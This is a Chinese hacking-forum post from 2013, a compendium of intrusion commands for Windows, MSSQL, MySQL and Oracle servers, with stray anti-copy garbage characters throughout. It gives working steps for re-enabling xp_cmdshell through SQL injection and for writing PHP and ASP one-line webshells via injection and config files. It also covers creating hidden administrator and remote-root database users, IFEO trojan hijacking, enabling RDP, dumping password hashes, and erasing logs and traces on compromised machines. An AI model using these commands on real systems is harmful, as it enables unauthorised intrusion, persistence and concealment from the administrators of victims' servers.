找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4792|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% |9 u; P; m0 U; ~5 P! i/ T4 y1.net user administrator /passwordreq:no1 M% n) ]! q& y
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了7 t+ v/ x+ m, c3 H& u2 n6 M
2.比较巧妙的建克隆号的步骤% G+ M) \( n2 m: t
先建一个user的用户( t/ V4 s- r  B
然后导出注册表。然后在计算机管理里删掉0 ]; t7 I+ P$ o+ _* J
在导入,在添加为管理员组
; D( X7 o, j  y" ]% F  Z3.查radmin密码# h- g5 k4 [; _/ E5 \# x- k! |2 \
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg% ?5 u& q- m; u
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]2 z, F: c. v+ f  g* h- [8 L
建立一个"services.exe"的项( E8 x4 H! C4 G7 p5 A
再在其下面建立(字符串值)
6 b3 h* _. Y% u) x( ~键值为mu ma的全路径
8 \1 ^5 l) u* e, P2 _# ~5 F5.runas /user:guest cmd/ ]" M  e& o" B+ Q# }
测试用户权限!) w: ^% u% @+ X: e1 @6 _: L" g
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
0 r  r8 Z( ^. @9 P7.入侵后漏洞修补、痕迹清理,后门置放:' l% }) ^! R( ~/ R7 ?
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门  \$ }. j7 F- d* C
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c: k8 l7 Q7 ~* b5 k* u: \/ {

) p" @) @& G8 x3 Jfor example& a  p8 n' H' g* ~" a! Y% B

* q$ p. s0 |8 S1 z8 r1 _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'* `: q8 X6 C) F3 Z6 D' T2 p
( ]. C5 `/ _! o) Q0 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'( K' z+ J/ G6 y4 F3 F7 F

, ^2 c. {; Q# F3 m5 A5 I9:MSSQL SERVER 2005默认把xpcmdshell 给ON了7 l5 k0 o5 k; h, |8 F- A# @
如果要启用的话就必须把他加到高级用户模式
$ h- @" H, r3 w# }/ j: V; j/ [! j/ `可以直接在注入点那里直接注入6 x+ B1 A( L" `$ m# X# x8 b& i' @
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
1 e, P( d0 P, t3 ~然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--, l; N  D, K" ~8 {
或者/ N9 G7 V) C8 z
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
* t' n# Q! X$ f4 n来恢复cmdshell。* Y5 `: p/ x3 v4 @9 A+ i( \8 z7 E

3 U7 [1 z1 A8 t4 q9 x% B. X: M- e分析器9 g, b3 H3 o5 C- d. m- f9 u) a# H
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--% Z4 y* [! B3 k. |5 v2 W
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
- a4 X' l! ^2 V/ Q7 ]10.xp_cmdshell新的恢复办法
' n2 B; c+ U/ Xxp_cmdshell新的恢复办法- A; P3 Z7 R! t8 h3 o  S
扩展储存过程被删除以后可以有很简单的办法恢复:
% I; T( n, }( F6 y删除
6 l- c8 B6 T2 [1 ^drop procedure sp_addextendedproc. W. T$ r3 }7 [; K6 F+ K* @4 u
drop procedure sp_oacreate
8 B. k9 N( W& }1 F2 |4 Y; M( Qexec sp_dropextendedproc 'xp_cmdshell'2 j) x- A/ _. ]2 P  r- d
! x( k5 C' q+ n, |$ h
恢复
' f5 `7 t$ G5 i( hdbcc addextendedproc ("sp_oacreate","odsole70.dll")
2 C, _! Z2 x: j6 X+ u$ Ydbcc addextendedproc ("xp_cmdshell","xplog70.dll")5 L" Q5 H# \9 h/ J6 U+ Z

6 i; a. m/ Z6 g" w" a这样可以直接恢复,不用去管sp_addextendedproc是不是存在
! s0 }! j- i+ w6 e! }) {" r& ~8 a, R; l& A" ~
-----------------------------6 h6 q; [& V6 ^- \" W2 e( y6 a9 M7 P6 f

" \5 n' D7 G# A/ F% o" r删除扩展存储过过程xp_cmdshell的语句:
: s0 ?8 V' r' W! Nexec sp_dropextendedproc 'xp_cmdshell'
# n1 ~) V2 p. Q  T& L$ T5 V3 x4 `' u7 S% [* e4 `" S4 \1 J3 ], P
恢复cmdshell的sql语句
2 e& A$ J7 d8 o  ^! jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 x  {" N; B0 v  `0 s# Y/ b8 @0 q! G% `9 Y( v

$ b4 Q  u: g5 _2 j  F7 z: K开启cmdshell的sql语句$ S2 Q9 T5 S$ b; }) L3 ?- X

; G5 z# B5 i4 g# b5 o# hexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 Q1 r9 J) ~8 N# y( y) c

# K  N$ T6 D3 C& E1 |* b判断存储扩展是否存在+ c; R* R2 ]: m/ v1 ]
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
& [$ H  q+ c! Y' \$ N返回结果为1就ok
0 _) |$ {- A( T% P$ ~) l3 G5 @5 {0 s8 k, l% t
恢复xp_cmdshell
& J/ @' `/ C- ?6 Q; C4 u6 q0 kexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
7 ^/ [* T! {/ |7 d6 t0 B3 L返回结果为1就ok
- ]& w1 x  `+ Q, [) L8 S, ?9 ]9 M4 p' t$ H/ n/ M% ^% g+ e
否则上传xplog7.0.dll
! s. y. P; s% b" g, |exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'2 y4 B$ c& ]$ H; M% A  P& ~' Z6 x0 P

) [* [3 t0 N5 k8 {' V. `堵上cmdshell的sql语句
" I6 P5 V& L: H" M+ usp_dropextendedproc "xp_cmdshel
9 \" z6 }0 y6 P% C+ A$ P( {-------------------------
8 [* D- `* @. y! @. v( Z) X0 g清除3389的登录记录用一条系统自带的命令:
3 d- E: p$ b0 V& freg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
1 G- Z0 p7 C. q3 @2 Y# Y: V6 Q: S4 G/ i, j! D! K, s
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& W, f& m& _& s: \$ Y0 Q+ B
在 mysql里查看当前用户的权限
+ e0 f& X8 d& b% Rshow grants for  2 a# v! l* M) O

: z7 f1 Y- G1 O以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。0 j7 R. I: h2 S( h  g
4 ?. i: H( m( R

0 Z7 |, U2 i- X+ N8 `% bCreate USER 'itpro'@'%' IDENTIFIED BY '123';
, a7 @) }7 I# v' f# s  g& z& }! `: O: P9 O  G+ L3 S
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
, n+ q4 V2 O$ \1 o) m" i
! m' U, Y. O/ p$ y6 L: @MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
& N, ~& n3 m- R) l: D+ H/ s1 X2 u( W# W6 V
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# j$ _$ A" S' d4 K
# M; j2 L) Q, }( J# O6 n
搞完事记得删除脚印哟。+ x6 O& \- T# ~2 t4 q

, z( N) Z+ ~- F" uDrop USER 'itpro'@'%';7 \2 b2 `: q1 F* u6 b
# M$ d0 I1 }$ D( ~1 v; s
Drop DATABASE IF EXISTS `itpro` ;5 ^/ Y* t# U9 |

6 N; P7 p- T% B& H* U9 H7 J- h. i当前用户获取system权限
- ^# T" R/ j+ ~  Y" tsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
/ U' C3 T1 Z* V% A$ {) @sc start SuperCMD5 N" H/ c: j9 M
程序代码! Y& C3 C6 A8 b) e
<SCRIPT LANGUAGE="VBScript">
- [. @# z* j$ F5 h2 n) Vset wsnetwork=CreateObject("WSCRIPT.NETWORK")- e8 X& ?( c$ I
os="WinNT://"&wsnetwork.ComputerName+ a7 X" u# ?4 C1 T! m& }
Set ob=GetObject(os). B$ i2 k# d; n( ]9 y
Set oe=GetObject(os&"/Administrators,group")
$ s% ]) J2 I* n) SSet od=ob.Create("user","nosec")
  q6 H; p" t5 f5 Y! ^  Z9 ?7 c3 L5 Cod.SetPassword "123456abc!@#"4 }; {) R7 D! h2 ]" E* _
od.SetInfo. a& V$ {) i4 L& Z- W( b
Set of=GetObject(os&"/nosec",user)
" u4 ^2 `' d4 `3 u. B, f/ woe.add os&"/nosec"
  v4 _/ n- `8 L8 m</Script>
( z3 L# p3 A* A6 N<script language=javascript>window.close();</script>
5 ~" R2 H& F6 }/ C( i0 I5 l1 P
) l& F( ~: w, X
. K) s6 Y* h8 `: s( w. ^5 ]
, q5 m& ]$ }- s4 |" z
$ l$ B3 Y' h% Y  W) m. S突破验证码限制入后台拿shell
- j$ G" \" F+ V& v. w程序代码: P- p% f( H6 Y& k
REGEDIT4
0 Y1 N% ?6 E  y& [[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 2 x& x  b$ z& s5 U* i' l1 l  I
"BlockXBM"=dword:00000000
+ S4 H) A  U( J
: @. s8 I$ I, n4 S; E& _保存为code.reg,导入注册表,重器IE
# @9 Y* C- E+ l+ L就可以了
9 T0 V" `% f6 K5 {  d+ r4 _union写马3 T2 b* J; Z7 F* h* G& [, Q
程序代码
- u) z) {5 ]# Hwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
; t, I! ^$ U! J3 S$ T+ X
' ~# d) q6 z. X4 k应用在dedecms注射漏洞上,无后台写马
% o$ v6 a/ p% I$ Gdedecms后台,无文件管理器,没有outfile权限的时候
) p; I/ O& M+ ?2 P: J; Z在插件管理-病毒扫描里7 F+ k. P1 p4 Y- [% ]5 X
写一句话进include/config_hand.php里
* H8 x  y: Y0 c* W3 B2 L程序代码6 ^" Z5 D3 f  J  I$ [
>';?><?php @eval($_POST[cmd]);?>; m. b" d/ k3 i: n; B: u- Y0 m8 T

1 \; u; x7 ~( x6 K  F8 p
) X% ^) @  j4 |( G) {* |- k如上格式
& r6 j& Y4 m1 X% Y, j
( i; a# D* M. [4 Yoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
6 [/ I; X  \! y* X$ U  H程序代码
) }( [2 h% Q5 P6 ]0 M$ T' nselect username,password from dba_users;: a2 m2 s  p8 ]1 n# M+ ~
- w1 [$ q2 Y6 ?1 b4 O/ P4 B6 o

4 Z: S) u4 S2 D$ a. Fmysql远程连接用户
8 G5 M( ]1 q2 N程序代码* j& ]: t- E9 E6 L& [& b

, r( z+ c- I2 q' WCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
, I( K& `1 T6 zGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION* Z( g2 Y0 a* v$ ]% K+ u0 _
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: g* a: b' o& l! M7 EMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
0 N7 X( a+ u# O: E; s2 d5 I. R3 D+ t0 }, O7 {3 G
+ m, ?6 b) p4 y6 k
& S4 m( K) ]9 N+ t

$ D+ M6 o0 v1 {echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
+ p, |7 l) c: [
0 Q/ M1 i" i3 l% i1 m  Q4 u( t% S! a* q1.查询终端端口
6 @* f2 Z% p; ]4 v' P2 {, N; b0 p; @& H' b
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
3 R8 n2 w' P6 \# T/ Q4 g) ?
% `" y1 H/ F! M! [# C* }通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
# W# q- ~# K% J3 A- j* ?( {type tsp.reg
5 Z# k6 u6 r9 G% t& K5 L
9 [' u: f! s$ p: C+ V2.开启XP&2003终端服务
1 M+ ?% p0 `3 k6 f$ \
  E6 ~4 m0 Q: h% t/ P4 _; e& L$ ~$ U. D* J
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
/ w! f( ?( q% b
' v: B# o" ?  H9 C- `
! a! U' S+ A% l8 mREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3 V* B7 j/ w# b+ h
  [: }& j7 }: v
3.更改终端端口为20008(0x4E28)
* K0 w+ N  w& K
+ @  _2 |4 _  uREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f; D# f- D( x( ?- j& K

1 R8 P' G4 ?" g7 W+ SREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
# t- V/ V' g( d3 f: p. w. t% R3 p8 R
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制, E; L) u3 k$ ]- A/ O

/ J& o9 v9 W( L" w; X8 q& K9 ^! TREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f1 j. p; c8 }% }7 K% t

, W9 P& g% F% r6 r$ d4 `2 ~8 b- a. ^+ T. [# G- m8 Q. o% `
5.开启Win2000的终端,端口为3389(需重启): Z6 j. y7 i; r0 D" R$ h

; r% S6 W( S' q. K* Z9 ~& V& [. iecho Windows Registry Editor Version 5.00 >2000.reg
6 O8 i% b. Y6 K( `4 K+ R) \7 gecho. >>2000.reg
1 _! ?: ~4 e/ o% h, P3 c& cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
1 `& O3 [! N" E5 {: G0 Eecho "Enabled"="0" >>2000.reg
6 ^+ P8 n# g3 y. X" u9 ^5 v; iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ! {2 F9 ~  G4 q3 N' G+ S& [# G
echo "ShutdownWithoutLogon"="0" >>2000.reg
( h7 }- g9 y; s  P: D5 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
3 A+ u& r8 i' ]( _' d/ Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg + T( x0 v! K  y# b. d9 P$ f0 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
5 e0 l6 F0 I' K4 y* a7 Oecho "TSEnabled"=dword:00000001 >>2000.reg + @* t. [. B& ^' \/ P. u5 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
6 v! u5 I) E" o7 t1 Necho "Start"=dword:00000002 >>2000.reg 9 E& ]1 H! S! A' `3 H" S2 G# ~) I4 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
1 ^7 B. ?) ^! C1 i* s* @echo "Start"=dword:00000002 >>2000.reg
; B2 p  w" w: f+ N0 [' k, necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
% z# \7 b+ j, X; r: Mecho "Hotkey"="1" >>2000.reg
2 x/ Q* \$ Y3 @  O$ Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg % `8 Y6 ~/ ?, F. N, C% k# ]) W. ]
echo "ortNumber"=dword:00000D3D >>2000.reg 9 l3 d+ ]: r* G! O, ?7 i& R/ M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 9 V, n4 q, I6 P; R$ T; Q' o( ~6 k
echo "ortNumber"=dword:00000D3D >>2000.reg
1 `* e' q9 M, ?/ H0 S: s4 \
1 m/ t. q! i% r# y- k$ ?" K6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
; T4 L( c; @  Q5 [
- T9 S0 w' h; \@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
/ k1 h4 o2 l/ `" ]' o" g(set inf=InstallHinfSection DefaultInstall)& x5 Y- k) `# F( T6 i7 z' o7 u* t
echo signature=$chicago$ >> restart.inf* {0 U  O- d( U% F  f! d) R$ _" v
echo [defaultinstall] >> restart.inf9 M! x6 j$ a2 Y9 w
rundll32 setupapi,%inf% 1 %temp%\restart.inf
; R1 J' S& O' w* d% t, B( g* Y1 y# A! G# x- B  q: `. Y

' T! V4 t5 F8 W; n7.禁用TCP/IP端口筛选 (需重启)0 Y, B* T0 ]9 d, }
3 ?: l( W; w, _/ y3 L
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f# V, f6 R1 ?, o

$ S0 [9 o3 j- b8.终端超出最大连接数时可用下面的命令来连接
0 q4 V' t' C, L$ A$ B
6 Y1 h! K! a+ ?$ Pmstsc /v:ip:3389 /console' ^* H& m5 P1 m  C: `

* p1 Y5 j- P2 u( [5 P$ L. V9.调整NTFS分区权限
. W$ @" [# |! l; V3 M; W
; e, ^  g7 R/ c- @4 ecacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
6 V  c" L. C% T2 a6 @% q8 a2 f. ]& {
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)& @& a  C/ h' L* J4 b: b

2 s. F2 x3 E+ U------------------------------------------------------
. P6 Q+ I$ O  h  \$ O3389.vbs
& r- d3 S( E: nOn Error Resume Next$ X+ }9 Q' L2 U( d) ^# V3 l
const HKEY_LOCAL_MACHINE = &H80000002
1 P* P( s3 b' I8 k( E$ tstrComputer = "."
* q, d% l- y, A% r# F; d; jSet StdOut = WScript.StdOut
1 P! r: [5 V( _4 u$ VSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ }) M7 q# X7 B' S1 ?% ~
strComputer & "\root\default:StdRegProv")
4 x/ {4 A+ p; W% `strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"6 Q- L$ L5 ~( E0 M4 ^( \$ X
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ A5 u0 |/ B& S* o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 u7 F" g# X( `: d
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 Q1 |! G3 s3 Y4 R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: W7 e  u" _( p# `2 O& Y% X/ N6 {strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
( C' w8 f, s$ S& wstrValueName = "fDenyTSConnections", w- P- q3 v1 g
dwValue = 0
, @, i- H4 X( h; U/ g9 eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; u9 W$ P# a% Q$ a/ a0 A1 V+ `8 y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& M4 {/ C8 \) O3 ^" I
strValueName = "ortNumber"9 B9 j4 Z7 g' [+ S* r& k! H- X
dwValue = 3389
7 ^4 R, m% z* R$ {) H2 |oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% m) N: u( X, R- D* k/ X0 GstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  u) v% k, z$ ?
strValueName = "ortNumber"4 v; e4 _. N! Y! n
dwValue = 3389# J% y" s. Q+ G/ o& `. c! X* y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; m$ f+ a  t. r5 K, t, DSet R = CreateObject("WScript.Shell") / B  ~+ L, ?2 l* d) i6 h# l
R.run("Shutdown.exe -f -r -t 0") & B" C! F8 v! h  y9 i4 ]

! B# g2 |) R& l# h# T: O9 {删除awgina.dll的注册表键值1 f- {* c1 i! Q
程序代码( j5 K6 X6 h1 b
2 n* K$ c  E% Q$ @" m
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f; o9 u# N3 \$ f) a! W
8 W! G% H( a5 z# ^6 b2 J* t

1 Z7 h, E/ q8 \( f% E5 K" F5 `0 p! v$ l8 i

( P8 a; {- T8 w  R( o程序代码9 f% r. U6 M0 S- R! ?1 ?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
; P2 H- X1 F' l  y* J8 E4 M: m8 s2 }8 K$ P- i( [& H$ p1 p
设置为1,关闭LM Hash
6 `! b6 g+ \- `1 F4 k. J" C! A, X3 t+ t5 `3 e
数据库安全:入侵Oracle数据库常用操作命令
; w! d" b+ C4 p* w& A最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。* @) ^; V4 A3 o1 o
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。7 v2 }1 _9 u, e) I3 w. {
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
* A: X  g4 ~. z( }9 b# r8 ]3、SQL>connect / as sysdba ;(as sysoper)或  I4 d: W" r$ l4 I& N) T% a
connect internal/oracle AS SYSDBA ;(scott/tiger)$ I  @0 F& ^, X  c3 a
conn sys/change_on_install as sysdba;
9 O; z  z/ Y/ E& q4、SQL>startup; 启动数据库实例# v$ t2 ~+ N" J* u3 c9 Z# p
5、查看当前的所有数据库: select * from v$database;
/ P- Y4 b8 l" ]/ l0 Tselect name from v$database;2 p8 \) `* W; T: V9 N, h
6、desc v$databases; 查看数据库结构字段
6 Q" e/ c# R6 q4 @, q; \+ B- `7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
) c5 V+ h# ?% B( HSQL>select * from V_$PWFILE_USERS;
* q$ c5 o) ]! o+ oShow user;查看当前数据库连接用户
, F% k( p1 \% r8、进入test数据库:database test;+ x, L. z1 H7 p% C! v; O3 ~( R
9、查看所有的数据库实例:select * from v$instance;
' p9 U: U7 L: S, g+ ~' b2 L; f" q如:ora9i: E( i; _- g  B. ]
10、查看当前库的所有数据表:
  c% l6 r4 N  K( z; lSQL> select TABLE_NAME from all_tables;
" ?/ w: R5 {  M8 `: w& H$ L8 yselect * from all_tables;
) w( _6 i5 ^& f* H# YSQL> select table_name from all_tables where table_name like '%u%';) V1 h( F6 j" v8 P) H
TABLE_NAME
, t' u( H5 q6 ]* {" [------------------------------
- d3 F6 r1 [; c0 `_default_auditing_options_5 g8 @( V7 J0 l" g8 p' z
11、查看表结构:desc all_tables;) }! w  d5 `8 S$ i0 u! B6 U1 u* t5 m$ q
12、显示CQI.T_BBS_XUSER的所有字段结构:
/ s( P) g( p% F8 ]. h* m  Gdesc CQI.T_BBS_XUSER;1 K) k/ w+ [- z" h6 I
13、获得CQI.T_BBS_XUSER表中的记录:
' E- ]1 d1 [6 ]2 ~select * from CQI.T_BBS_XUSER;/ o: B$ L' c) ^* C
14、增加数据库用户:(test11/test)
6 L5 h: w( H  O# k1 u  Gcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;- I: v! x* L% y# p# q* @- h: V( s; H
15、用户授权:% C3 x1 [/ m& E1 Q- e! |
grant connect,resource,dba to test11;
) X) z/ m, M5 v2 ]  Y8 ?grant sysdba to test11;
4 X$ @; H9 O; h/ B+ G$ ?+ ycommit;
/ n: b3 T1 J/ B2 l16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 K/ }* ?* v1 H  `0 jalter user sys indentified by test;
) Y1 m4 Y* i! X; I6 h( d1 Jalter user system indentified by test;9 ?- u; G8 T3 `# m/ m

9 D/ y' z8 P2 X2 tapplicationContext-util.xml0 ^2 _. R* l6 h# |1 D4 K
applicationContext.xml
0 Z3 I8 y! o  I8 tstruts-config.xml
; G6 X% W+ W. j# i9 t% }! o7 [web.xml
& ^# Y; k" w7 H6 n1 \& f1 Dserver.xml
6 y. v6 `6 U' Q* dtomcat-users.xml; B( W5 W7 D# j) S# _! M
hibernate.cfg.xml
" n7 R6 N9 I) k7 d! Y0 R4 Hdatabase_pool_config.xml
  D) E; R; x0 N2 u) b' X$ }( i# M, Z3 i% M( u6 X# d( w: B* l9 O; F: t9 g

" x% C) d" A) A: L! o\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置- \3 r2 i1 r  r4 Y4 |" V( s
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini% {2 U4 b' s3 g( f( h- f
\WEB-INF\struts-config.xml  文件目录结构
( `: M9 x0 U: A( @& i9 d3 _% G3 V, G) q& y1 a* u
spring.properties 里边包含hibernate.cfg.xml的名称  O/ j' B# g" K5 W
* R# l5 D' }6 u6 P. \3 |! y2 a0 I
7 \# `1 c% F9 c# O) `- s& k/ u
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml$ H% C. j6 \7 }" l
" G+ r2 F8 {6 g' X2 P& u7 J
如果都找不到  那就看看class文件吧。。
* t: d, O/ b; g! N  e' \( @7 v$ @# K: h) o
测试1:: e4 C: V; \' g! P9 ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
: J) h9 I* S* @* }8 R# n3 N% h9 w% r2 f2 L
测试2:
3 X7 e8 K# H+ g5 l, p" O7 O& h' d5 j4 u
create table dirs(paths varchar(100),paths1 varchar(100), id int)0 \+ ^1 L4 K3 ?

2 S6 r+ |" B+ X! tdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, M1 O9 x4 E1 ~  l# T6 {  j; _5 x# l9 w8 H5 t
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1. O0 V' Z8 `) g) K6 t
/ c5 J+ V8 g3 _1 U6 w5 P6 K
查看虚拟机中的共享文件:
: G* _( \/ D! C- U  f在虚拟机中的cmd中执行; G- F5 O% Q# U, H7 t( f2 d
\\.host\Shared Folders. `! }& L5 D' q+ ]
0 y# Z, V9 ]3 _! C8 m* A1 @  f$ P0 F
cmdshell下找终端的技巧% }0 E- D& c2 c; X1 Y
找终端: - m3 K; G  x8 q" m; S7 p
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
# p9 Y8 F, H: d) J# y& X/ K   而终端所对应的服务名为:TermService
2 L; S  [! V1 y: |第二步:用netstat -ano命令,列出所有端口对应的PID值!
1 Q/ [8 X7 n  ^* e   找到PID值所对应的端口
# N& \% S( B4 q6 V( p' ]
4 a" w) s/ n3 y. R' r5 Z- \8 `查询sql server 2005中的密码hash, @. P! j0 M7 I- q
SELECT password_hash FROM sys.sql_logins where name='sa'
6 }) o& m, K/ U" w3 vSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a# ~! L# u: e5 q, j9 q5 t: L+ X. A
access中导出shell
